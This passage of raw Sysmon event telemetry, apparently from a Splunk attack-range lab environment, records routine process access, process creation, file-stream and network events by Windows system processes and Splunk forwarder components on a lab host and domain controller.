LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1AE4-6216-7205-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AE4-6216-7205-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-1AE4-6216-7205-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.523{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45A6C1BE38DE399D86F832CAE8300EE1,SHA256=1F199738D20A755DCED3148D2201CCD0C9D669F6ACA888A8DF9130866D30D848,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.462{4F8D34B0-1AE4-6216-7105-000000003902}24563164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AE4-6216-7105-000000003902}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AE4-6216-7105-000000003902}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.211{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AE4-6216-7105-000000003902}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.212{4F8D34B0-1AE4-6216-7105-000000003902}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:45.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF69EB089126E2D4FB456049D6A7236,SHA256=F5B5CCCC0D7E600BE4F49E843ECAA0176F4CFCEA78EBD91858E8B8E08FB036EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:45.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=779C8F9323E77363A9E03FA921C13D6A,SHA256=46ED6288D71DB5D3688D86F431AAF3C869A31C6839AC3D708F804817A8813A75,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:42.668{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49684-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:45.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3C67B2F7CC722508005FFB6CD35BA29,SHA256=8BA6DFFC770E2BFAB4F38333A7D6946B781D08C052815040FEB7B087B95DD481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:45.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C6A410355B035FABD760C5645C97720,SHA256=9969F90709B3DA061E0A6F627D80CF5AC04850C9D6938A4EC3DE183A8D967F35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:46.706{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17B4440E4BAD02B47B3C3D803717531B,SHA256=983707251CC1EA4253A8F041B3F9A97E3FF6C436706477054015A35B46694F90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.898{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.773{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94CC776AE58BD76F024F439396B678C2,SHA256=2E0F91EFEC74B73FCA4439C4161675C91670D23C5882F5F4D4E3C09F29BD9776,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AE6-6216-7305-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 